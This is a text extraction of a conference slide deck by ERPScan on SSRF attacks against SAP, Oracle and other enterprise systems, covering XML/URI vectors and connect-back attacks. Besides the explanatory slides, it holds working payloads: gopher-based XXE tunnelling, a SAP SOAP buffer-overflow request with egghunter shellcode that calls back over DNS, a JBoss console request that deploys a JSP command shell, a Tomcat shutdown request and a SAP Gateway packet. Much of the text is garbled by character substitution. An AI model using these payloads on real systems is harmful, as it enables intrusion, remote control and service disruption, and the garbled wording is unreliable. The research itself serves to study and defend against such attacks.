SlideShare a Scribd company logo

SSRF vs. Business-critical applications. Part 2. New vectors and connect-back attacks

ERPScan, profile picture
ERPScan

This document discusses server-side request forgery (SSRF) attacks and their history. SSRF attacks allow an attacker to exploit vulnerabilities in web applications to initiate requests from the server to other internal or external systems. The document outlines the basics of SSRF attacks and categorizes different types, providing examples of how SSRF can be used in proxy and connect-back attacks. It emphasizes the risk of SSRF attacks against critical enterprise applications given the sensitive data they contain.

Software
Related topics:
Oracle Database Insights
1 of 87
Downloaded 20 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
Invest  in  security   to  secure  investments   SSRF  VS.  BUSINESS-­‐CRITICAL   APPLICATIONS   PART  2:  NEW  VECTORS  AND  CONNECT-­‐ BACK  ATTACKS     Alexander  Polyakov  –  CTO  at  ERPScan    
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaQons  key  security  conferences  worldwide   •  25  Awards  and  nominaQons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
Agenda   •  Enterprise  applica8ons   •  SSRF     –  History   –  Types   •  SSRF  Proxy  aLacks   –  Example  of  ALacking  SAP  with  SSRF   •  SSRF  Connect-­‐back  aLacks   –  Examples   •  XXE  Scanner   •  Conclusion   3  
Enterprise  applicaQons:  DefiniQons    Business  so)ware  is  generally  any  so)ware  that  helps  business  to   increase  its  efficiency  or  measure  its  performance     •  Small  (MS  Office)   •  Medium  (CRM,  Shops)   •  Enterprise  (ERP,  BW…)   4  
Why  are  they  criQcal?   •   Any  informa7on  an  a8acker  might  want,  be  it  a  cybercriminal,   industrial  spy  or  compe7tor,  is  stored  in  corporate  ERP.  This   informa7on  can  include  financial,  customer  or  public  rela7ons,   intellectual  property,  personally  iden7fiable  informa7on  and   more.  Industrial  espionage,  sabotage,  and  fraud  or  insider   embezzlement  may  be  very  effec7ve  if  targeted  at  the  vic7m’s   ERP  system,  and  they  can  cause  significant  damage  to  the   business.   5  
Business-­‐criQcal  systems  architecture   •  Located  in  a  secure  subnetwork       •  Secured  by  firewalls     •  Monitored  by  IDS  systems   •  Regularly  patched     6  
Noahhh…   7  
But  let’s  assume  that  they  are,   because  it  will  be  much  more   interes8ng  to  aLack  them   8  
Secure  corporate  network     The     Internet     9   Industrial   network   ERP     network   Corporate   network  
But  wait.   There  must  be  some  links!   10  
Real  corporate  network   The   Internet     11   Industrial   network   ERP     network   Corporate   network  
And…   ALackers  can  use  them!   12  
Corporate  network  a^ack  scenario   The   Internet     13   Industrial   network   ERP     network   Corporate   network  
But  how?   14  
SSRF   15  
Supa  Sexy  Robo  Fashion   16  
SSRF  History:  the  beginning   •  SSRF:  Server  Side  Request  Forgery.     •  An  aLack  which  was  discussed  in  2008  with  very  liLle   informa8on  about  theory  and  prac8cal  examples.     •  Like  any  new  term,  SSRF  doesn’t  show  us  something  completely   new  like  a  new  type  of  vulnerability.  SSRF-­‐style  aLacks  were   known  before.       17  
SSRF  History:  Basics   •  We  send  Packet  A  to  Service  A   •  Service  A  ini8ates  Packet  B  to  service  B   •  Services  can  be  on  the  same  host  or  on  different  hosts   •  We  can  manipulate  some  fields  of  packet  B  within  packet  A   •  Various  SSRF  aLacks  depend  on  how  many  fields  we  can   control  in  packet  B     18   Packet  A   Packet  B  
SSRF    history   •  DeralHeiland  –  Shmoocon  2008   –  Web  Portals  Gateway  To  Informa8on  Or  A  Hole  In  Our  Perimeter  Defenses   •  Spiderlabs  2012   –  hLp://blog.spiderlabs.com/2012/05/too-­‐xxe-­‐for-­‐my-­‐shirt.html   •  Vorontsov  2012   –   SSRF  via  XXE   hLp://2012.caro.org/presenta8ons/aLacks-­‐on-­‐large-­‐modern-­‐web-­‐ applica8ons   •  ERPScan  (Polyakov,Chastuchin)  -­‐  SSRF  vs  business  cri8cal   applica8ons  (Gopher  protocol)  2012  august   –  hLp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐business-­‐ cri8cal-­‐applica8ons.-­‐XXE-­‐Tunelling-­‐in-­‐SAP.pdf   19  
SSRF    history   •  ssrfsocks  by  iamultra:  a  tool  for  ERPScan’s  vulnerability  in  Gopher   –  hLps://github.com/iamultra/ssrfsocks    2012  august     •  Less  Known  Web  App  Vulnerabili8es:  Real  World  Examples.  (From   ERPScan  paper)  2012  October   •  ERPScan  -­‐  Gopher  SSRF  in  JVM  advisory    October  2012   –  hLp://erpscan.com/advisories/dsecrg-­‐12-­‐039-­‐oracle-­‐jvm-­‐gopher-­‐protocol-­‐ ssrf/   •  ERPScan  (Polyakov)  -­‐  SSRF  2.0   –   hLp://erpscan.com/category/publica8ons/   •  New  research  will  be  published  at  ZeroNights   hLp://2012.zeronights.org/   20  
Ideal  SSRF            The  idea  is  to  find  vic7m  server  interfaces  that  will  allow  sending   packets  ini7ated  by  the  vic7m  server  to  the  localhost  interface   of  the  vic7m  server  or  to  another  server  secured  by  a  firewall   from  outside.  Ideally,  this  interface  :     •  Must  allow  sending  any  packet  to  any  host  and  any  port   •  Must  be  accessed  remotely  without  authenQcaQon       21  
Why?   In  this  research,  we  wanted  to  :     •  Collect  the  informa8on  about  SSRF  aLacks   •  Categorize  them   •  Show  examples  of  SSRF  aLacks   •  Show  new  poten8al  and  real  SSRF  vectors       22  
SSRF   Trusted  SSRF   Remote   SSRF   SSRF  proxy  aLack   SSRF  back  connect   SSRF  counter   aLack   Local  SSRF   Simple   Par8al   Full   23  
SSRF  proxy  a^ack   24   Secure     network   Corporate   network   Packet  B  Packet  B   Packet  A  
SSRF  back  connect  a^ack   25   Packet  B   Packet  C   Packet  B   Packet  A  
SSRF  proxy  a^acks   •  Trusted  SSRF  (Can  forge  requests  to  remote  services  but  only  to   predefined  ones)   •  Remote  SSRF  (Can  forge  requests  to  any  remote  IP  and  port)   –  Simple  Remote  SSRF  (No  control  on  app  level)   –  ParQal    Remote  SSRF  (Control  in  some  fields  of  app  level)   –  Full  Remote  SSRF  (Control  on  app  level)   26  
ExploiQng  SSRF            For  every  SSRF  a8ack,  there  must  be  at  least  2  vulnerabili7es  to   successfully  trigger  the  a8ack:   •  First  vulnerability   –  Func8onality  to  create/use  links  (for  trusted  SSRF)   –  Func8onality  in  some  service  on  Server  A  which  allows  us  to  send  remote   packets  (for  other  types  of  SSRF)   •  Second  vulnerability     –  Insecure  link  (for  trusted  SSRF)   –  Vuln.  in  service  on  server  B  (for  remote  SSRF  )   –  Vuln.  in  localhost  service  on  server  A  (for  local  SSRF)   –  Vuln.  in  client  app.  on  server  A  (for  back-­‐connect  SSRF)   27  
Trusted  SSRF   •  Trusted  SSRF  in  Oracle   –  SELECT  *  FROM  myTable@HostB   –  EXECUTE  Schema.Package.Procedure('Parameter')@HostB   •  Trusted  SSRF  in  MSSQL       –  Select  *  from  openquery(HostB,'select  *  from  @@version')]   •  Trusted  SSRF  in  SAP  NetWeaver     –  SM59  transac8on   •  Also  Lotus  Domino  and  others         28   Not  so  interes8ng…  
First  vulnerability  (funcQonality  on  Server  A)   •  Unusual  calls   •  Mul8protocol  calls  (URI)   –  In  engines  (XML)   –  In  applica8ons     •  UNC  calls   •  HTTP  calls   •  FTP  calls   •  LDAP  calls   •  SSH  calls   •  Other  calls     29  
FuncQonality  on  server  A:  Unusual  calls   •  Remote  port  scan   –  SAP  NetWeaver  wsnavigator  (sapnote  1394544,871394)   –  SAP  NetWeaver  ipcpricing  (sapnote  1545883)   –  SAP  BusinessObjects  viewrpt  (sapnote  1583610)   •  Remote  password    bruteforce   –  SAP  NetWeaver  (NDA)   •  Other   –  Informa8on  disclosure  by  tes8ng  if  a  file  or  a  directory  exists   –  Timing  aLacks   –  Etc????   30   Very  applica8on-­‐specific.  Can  be  very  interes8ng  
Example  of  unusual  calls   31   •   It  is  possible  to  scan  internal  network  from  the  Internet   •   Authen8ca8on  is  not  required   •   SAP  NetWeaver  J2EE  engine  is  vulnerable         /ipcpricing/ui/BufferOverview.jsp?   server=172.16.0.13     &  port=31337     &  dispatcher=     &  targetClient=     &  view=    
Port  scan  via  ipcpricing  JSP     32   Port  closed   HTTP  port   SAP  port  
MulQprotocol  calls  (in  XML)   •  XML  seems  to  be  the  new  TCP.   •  Almost  all  big  projects  use  XML-­‐based  data  transfer.   •  There  are  a  lot  of  XML-­‐based  protocols  with  different  op8ons  to   call  external  resources  and  thus  conduct  SSRF  aLacks.     •  There   is   at   least   one   element   type   which   fits   almost   all   XML-­‐ based  schemes.  The  type  is:  xsd:anyURI.     •  URIs  also  encompass  URLs  of  other  schemes  (e.g.,  FTP,  gopher,   telnet),  as  well  as  URNs.   •  Popular  URIs:  hLp://  vp://  telnet://  …..   33  
MulQprotocol  calls  in  XML   •  XML   –  XML  External  En8ty   –  XSD  defini8on   •  XML  Encryp8on   •  XML  Signature   •  WS-­‐Policy   •  From  WS-­‐Security   •  WS-­‐Addressing   34  
MulQprotocol  calls  in  XML   •  XBRL   •  ODATA  (edmx)   –  ODATA  External  En8ty   –  Other   •  BPEL   •  STRATML   35  
XML  EncrypQon     1.  <xenc:AgreementMethod  Algorithm=  "hLp://ServerB/">   2.  <xenc:Encryp8onProperty  Target=  "hLp://ServerB/">   3.  <xenc:CipherReference  URI=  "hLp://ServerB/">   4.  <xenc:DataReference  URI=  "hLp://ServerB/">   36   Successfully  Tested    
XML  Signature     1.  <Reference  URI=”hLp://ServerB/aLack”>     37   Successfully  Tested    
WS-­‐Addressing   1.  <To  xmlns="hLp://www.w3.org/2005/08/addressing">    h^p://ServerB/                </To>     2.  <ReplyTo  xmlns="hLp://www.w3.org/2005/08/addressing">   <Address>h^p://ServerB/</Address>                </ReplyTo>     38   Successfully  Tested  (0-­‐day)    
WS-­‐Policy     1.  <wsp:PolicyReference  URI="hLp://ServerB/">       39   Not  Tested  
WS-­‐Security   1.  <input  message=“blabla“      wsa:AcQon="hLp://ServerB”/>   2.   <output  message=“blabla  “  wsa:AcQon="hLp://ServerB"/>       40   Not  Tested    
WS-­‐FederaQon   1.  <fed:Federa8on  Federa8onID="hLp://ServerB/">     2.  <fed:Federa8onInclude>hLp://ServerB/</fed:Federa8onInclude>   3.  <fed:TokenIssuerName>hLp://ServerB/</fed:TokenIssuerName>   4.  <mex:MetadataReference>                          <wsa:Address>hLp://ServerB/</wsa:Address>                  </mex:MetadataReference>     41   Not  Tested    
XBRL   1.  <xbrli:iden8fier  scheme="hLp://ServerB/">   2.  <link:roleType  roleURI="hLp://ServerB/">       42   Not  Tested    
ODATA  (edmx)                The  edmx:Reference  element  specifies  external  en7ty  models   referenced  by  this  EDMX.  Referenced  models  are  available  in   their  en7rety  to  referencing  models.  All  en7ty  types,  complex   types  and  other  named  elements  in  a  referenced  model  can  be   accessed  from  a  referencing  model.       hLp://www.odata.org/media/30002/OData%20CSDL%20Defini8on.html   43   No  examples  of  edmx  in  the  wild  (new  protocol)  
ODATA     1.  <edmx:Reference  URI=”hLp://ServerB/aLack”>   2.  <edmx:Annota8onsReference  URI=”hLp://ServerB/aLack”>       44   S8ll  no  products  for  tes8ng  (0-­‐day)  
STRATML     1.  <stratml:Source>h^p://ServerB/</stratml:Source>       45   Not  tested  
SOAP         SoapAc8on?       46   No  Examples  
Mul8protocol  Calls  in   Applica8ons   47  
MulQprotocol  calls     Not  so  usual  but  a  poten7ally  big  area   •  Oracle  Database     –  UTL_TCP   48  
UNC  calls:  threats   •  Sure  you  can  call  UNC  path  if  you  have  a  universal  URI   •  But  if  there  is  no  universal  engine  you  can  search  for  UNC   •  UNC  calls  can  be  used  for:   –  conduc8ng  SMBRelay  aLack   –  reading  files  from  shared  folders  (open  or  trusted)   –  other  vectors  which  will  be  discussed  later.   49   Check  SMBRelay  bible  posts  from   hLp://erpscan.com/?s=SMBRelay+Bible&x=0&y=0  
UNC  calls:  applicaQons   •  SAP  NetWeaver   –  From  SAP  webservices  (sapnote  1503579,1498575)   –  From  RFC  func8ons  (sapnote  1554030)   –  From  SAP  transac8ons,  reports  (sapnote  1583286)   •  Oracle  Database   –  Listener   –  Database  commands  such  as  ctxsys.context     50   And  much  more  
UNC  calls:  applicaQons   •  MsSQL  Database   •  MySQL  Database   •  FTP  servers   •  IBM  Lotus  Domino  controller   •  VMWare   •  Anything  that  uses  XML  engine   51   And  much  more  
HTTP  calls:  threats   •  Sure  you  can  call  HTTP  path  if  you  have  a  universal  URI   •  But  if  there  is  no  universal  engine,  you  can  search  for  HTTP   •  HTTP  calls  can  be  used  for  conduc8ng  wide  range  of  aLacks   on  systems  which  are  in  one  network  with  Server  A   -  DoS   -  Inf  disclosure   -  Unauthorized  access  (like  invoker  servlets)   -  Bruteforcing  (users/directories/pages)   -  Fingerprin8ng   -  etc       52   Examples  of  HTTP  aLacks  are  beyond  the  current  research  
HTTP  calls:  applicaQons   •  SAP  NetWeaver   –  Transac8ons   –  Reports   –  RFC  commands   –  Portal  portlets   –  Portal  links   •  Oracle  Database   –  UTL_HTTP   •  MsSQL  Database   •  PostgreSQL  Database   •  Anything  that  uses  XML  engine   53   And  much  more  
FTP  calls  threats   •  Sure  you  can  call  FTP  path  if  you  have  a  universal  URI   •  FTP  is  usually  possible  whenever  HTTP  is  possible   •  But  if  there  is  no  universal  engine,  you  can  search  for  FTP   •  FTP  calls  can  be  used  to  conduct  wide  range  of  aLacks  on   systems  which  are  in  one  network  with  Server  A   -  DoS   -  Inf  disclosure   -  Unauthorized  access  (like  invoker  servlets)   -  Bruteforcing  (users/directories/pages)   -  Fingerprin8ng   -  etc.       54   Examples  of  FTP  aLacks  are  beyond  the  current  research  
FTP  calls:  applicaQons   •  SAP  NetWeaver   –  Transac8ons   –  Reports   –  RFC  commands   •  Oracle  Database   –  UTL_HTTP   •  PostgreSQL  Database   •  Anything  that  uses  XML  engine   55   And  much  more  
Other  calls   •  ldap://   –  Bruteforce  logins   –  Informa8on  disclosure   •  jar://     –  Informa8on  disclosure   •  mailto:   •  ssh2://   –  Bruteforce  logins   –  Rce?   •  gopher://     –  XXE  Tunneling   •  …….   56   Just  the  most  popular  ones  
ExploiQng  Gopher  (Example)   <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>     57   What  will  happen??  
XXE  Tunneling  (Example)   58   Server  B  (ERP,   HR,  BW  etc.)   Server  A  (Portal  or  XI)     192.168.0.1   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  192.168.0.1:8000     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher:// 172.16.0.1:3300/AAAAAAAAA"  >]>    <foo>&date;</foo>   AAAAAAAAAAAAA   Port   3300   telnet  172.16.0.1  3300  
XXE  Tunneling  to  Buffer  Overflow  (Example)   •  A  buffer  overflow  vulnerability  found  by  Virtual  Forge  in  ABAP   Kernel  (fixed  in    sapnote  1487330)   •  Hard  to  exploit  because  it  requires  calling  an  RFC  func8on  which   calls  Kernel  func8on   •  But  even  such  a  complex  aLack  can  be  exploited   •  Get  ready  for  the  hardcore   59  
XXE  Tunneling  to  Buffer  Overflow  (Hint  1)   •  Shellcode  size  is  limited  to  255  bytes  (name  parameter)   •  As  we  don’t  have  direct  connec8on  to  the  Internet  from  the   vulnerable  system,  we  want  to  use  DNS  tunneling  shellcode  to   connect  back   •  But  the  XML  engine  saves  some  XML  data  in  RWX  memory   •  So  we  can  use  egghunter   •  Any  shellcode  can  be  uploaded     60  
XXE  Tunneling  to  Buffer  Overflow:  Packet  B       POST  /sap/bc/soap/rfc?sap-­‐client=000  HTTP/1.1   Authoriza8on:  Basic  U1FQKjowMjA3NTk3==   Host:  company.com:80   User-­‐Agent:  ERPSCAN  Pentes8ng  tool  v  0.2   Content-­‐Type:  text/xml;  charset=u•-­‐8   Cookie:  sap-­‐client=000   Content-­‐Length:  2271       <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hLp://schemas.xmlsoap.org/soap/envelope/"  xmlns:SOAP-­‐ENC="hLp://schemas.xmlsoap.org/soap/ encoding/"  xmlns:xsi="hLp://www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xsd="hLp://www.w3.org/2001/XMLSchema"><SOAP-­‐ ENV:Body><m:RSPO_R_SAPGPARAM  xmlns:m="urn:sap-­‐ com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff‚4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4 M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O 0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c0 53q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3 Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91T GFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0 Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494 M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T0 82L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T 9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</ HEAP_EGG><NAME>&#186;&#255;&#255;&#206;&#060;&#102;&#129;&#202;&#255;&#015;&#066;&#082;&#106;&#067;&#088;&#205;& #046;&#060;&#005;&#090;&#116;&#239;&#184;&#100;&#115;&#101;&#099;&#139;&#250;&#175;&#117;&#234;&#175;&#117;&#231;&# 255;&#231;&#144;&#144;&#144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#158;&#14;&#190; &#171;DSEC&#094;&#023;&#012;&#001;&#252;&#049;&#043;&#001;&#212;&#083;&#242;&#000;&#018;&#058;&#071;&#000;&#250;&# 047;&#057;&#016;&#076;&#255;&#084;&#000;&#001;&#002;&#000;&#000;&#226;&#020;&#095;&#000;&#064;&#000;&#000;&#000;&#0 97;&#125;&#088;&#016;&#115;&#167;&#113;&#002;&#117;&#218;&#157;&#000;&#004;&#128;&#069;&#000;&#082;&#089;&#012;&#01 6;&#235;&#004;&#235;&#002;&#134;&#027;&#198;&#000;&#255;&#255;&#233;&#077;&#255;&#255;&#255;&#255;AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-­‐ ENV:Body></SOAP-­‐ENV:Envelope>     61  
XXE  Tunneling  to  Buffer  Overflow  (Hint  2)   •  Next  step  is  to  pack  this  packet  B  into  Packet  A     •  We  need  to  insert  non-­‐printable  symbols     •  God  bless  gopher;  it  supports  urlencode  like  HTTP   •  It  will  also  help  us  evade  aLack  against  IDS  systems       62   POST  /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post  HTTP/1.1   Host:  sapserver.com:80   Content-­‐Length:  7730     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[Urlencoded  Packet  B]"  >]>    <foo>&date;</foo>   Packet  A  
XXE  Tunneling  to  Buffer  Overflow  (Result)   63   Server  B  in  DMZ   (SAP  ERP)   Server  A  on  the   Internet   (SAP  XI)     hLp://company.com   172.16.0.1   POST  /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.DilbertMSG? format=post  HTTP/1.1   Host:  sapserver.com:80     <?xml  version="1.0"  encoding="ISO-­‐8859-­‐1"?>    <!DOCTYPE  foo  [      <!ELEMENT  foo  ANY  >    <!ENTITY  date  SYSTEM  “gopher://[packetB]"   >]>    <foo>&date;</foo>   Port  8000   WebRFC   service   Packet  B     Shellcode   service  with   DNS   payload   Packet  C  –  Command  and   Control  response  to  a^acker  by   DNS  protocol  which  is  allowed   for  outband  connecQons  
Full  control  over  the  internal  system  through   the  Internet   64  
So,  you  can  only  send  one  packet  by  gopher   but  you  can’t  control  the  session…   Hmm,  actually,  some8mes  you  can.     65  
Session  handling  by  SSRF  (trick  1)   •  Using  Gopher,  it  is  possible  to  send  mul8ple  packets  in  one   session      Just  add  them  like  this   –  Gopher://[packet1][packet2][packet3].....   –  But  you  must  know  the  session  ID  or  use  a  protocol  without  session  ID   like  telnet   66   Successfully  tested  for  SAP  Message  Server  param.  change  
Session  handling  by  SSRF  (trick  2)   •  Just  theoreQcal       •  Let’s  suppose  that  session  is  handled  by  the  IP  and  port  of  client   •  First  packet  is  sent  from  some  random  port,  for  example,  3000   •  Collect  info  about  the  session  from  the  response   •  Construct  the  second  packet  (next  8me,  the  source  port  will  be   3001,  3002…  etc.)   •  Send  the  second  packet  un8l  the  source  port  will  be  3000  again     67   Needs  tes8ng  
Now  let’s  talk  about  different  SSRF  aLacks     When  we  aLack  the  same  host  with  SSRF   68  
SSRF  back  connect  a^ack   •  Local  SSRF          The  idea  is  to  ini8ate  connec8on  to  localhost  services  in  Server  A   •  Counter-­‐a^ack            The  idea  of  this  aLack  is  to  send  Packet  A  to  Server  A  .  Service   must  take  Packet  B  and  send  it  to  the  aLacker’s  Server  C.  Server   C  will  make  a  malformed  response  to  server  A  and  trigger  a   client-­‐side  vulnerability  in  the  applica8on.     69  
Local  SSRF   •  The  first  example  is  local  SSRF   •  We  try  to  aLack  localhost  ports  on  the  same  server  with  SSRF   •  There  are  a  lot  of  ports  listened  by  OS  and    applica8ons  at   localhost  and  usually  they  are  less  secure   70   Currently  working  on  a  database  of  most  interes8ng  ports  
But  you  want  examples…  OK  OK!   71  
Local  SSRF  to  Tomcat  shutdown     •  Tomcat  management  port  8005   •  Open  only  for  localhost   •  gopher://localhost:8005/SHUTDOWN%0d%0a   72   Successfully  exploitable  (tnx  Alexey  Sintsov)  
Local  SSRF  to  Oracle  Listener     •  Problem   –  An  old  vulnerability  in  Oracle  listener  in  Set_log_file   –  Secured  by  LOCAL_OS_AUTHENTICATION  in  10G   •  ALack   –  User  with  CONNECT  privileges  can  run  UTL_TCP  func8ons   –  Using  UTL_TCP,  it  is  possible  to  construct  any  TCP  packet  and  send  it  to   the  listener   –  Connec8on  will  be  from  a  local  IP,  so  we  will  bypass   LOCAL_OS_AUTHENTICATION  restric8ons       73   Tested  in  early  2008  
Local  SSRF  to  JBOSS  console     •  JBOSS  management  console  service   •  Even  with  a  simple  HTTP  request   •  Open  only  for  localhost                          hLp://localhost:8080/jmx-­‐console/HtmlAdaptor?ac8on=invokeOpByName&name=jboss.admin%3Aservice %3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argT ype=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d %22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c %48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e %41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e %50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c %49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e %20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e %67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c %29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b %20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e %74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d %65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e %67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f %75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f %75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d %20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e %70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e %70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d %20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d %20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b %20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f %70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True   74   tnx  Alexey  Sintsov  for  sploit  
Bypass  SAP  security  restricQons   •  It  is  possible  to  bypass  many  SAP  Security  restric8ons  based  on  ACL     –  SAP  Gateway   –  SAP  Message  Server   –  Other  remote  services        gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A %67%77%2F%6D%61%78%5F%73%6C %65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE %D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE %D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA %1E %43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00 %00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C %00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C %48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE     75   Gateway  example  
 Counter-­‐a^ack  SSRF   76  
Counter-­‐a^ack  SSRF   •  This  is  the  most  interes8ng  way  to  use  SSRF,  which  was  not   discussed  before  .     •  We  send  a  command  from  Server  A  to  our  Server  C  using  SSRF,   and  then  we  generate  a  response  which  will  trigger  a   vulnerability  in  an  applica8on  from  Server  A.   •  Some  interes8ng  aLacks  are  also  possible.       77   New  life  for  client-­‐side  bugz  
Counter-­‐a^ack  on  SMB  client   •  DoS  by  reading  huge  files  remotely   •  SMBRelay   •     RCE  Vulnerabili8es  in  SMB  client   –  MS10-­‐006   –  MS10-­‐020     –  MS11-­‐019   –  MS11-­‐043       78   Looking  for  a  working  example  of  client-­‐side  bug  
Counter-­‐a^ack  on  FTP  client   •  Memory  corrup8on  vulnerabili8es  in  FTP  client.   –  Some  examples   hLps://www.corelan.be/index.php/2010/10/12/death-­‐of-­‐an-­‐vp-­‐client/   •  Client  path  traversal   –  Those  types  of  vulnerabili8es  are  rare  nowadays  but  there  are  some   chances  to  find  them  in  industrial  systems  because  they  were  created  a   long  8me  ago.         79   Working  on  real  examples  
Counter-­‐a^ack  on  HTTP  client                The  most  widespread  type  of  SSRF  requests  is  HTTP.  It  means   that  vulnerabili7es  in  embedded  HTTP  clients  (which  are  used  by   different  XML  engines,  for  example)  are  the  most  sought-­‐a)er   part  of  our  future  research   –  DoS  by  mul8ple  en88es  with  links  to  big  data   –  DoS  by  mul8ple  GZIP  bombs         80   Working  on  real  examples  
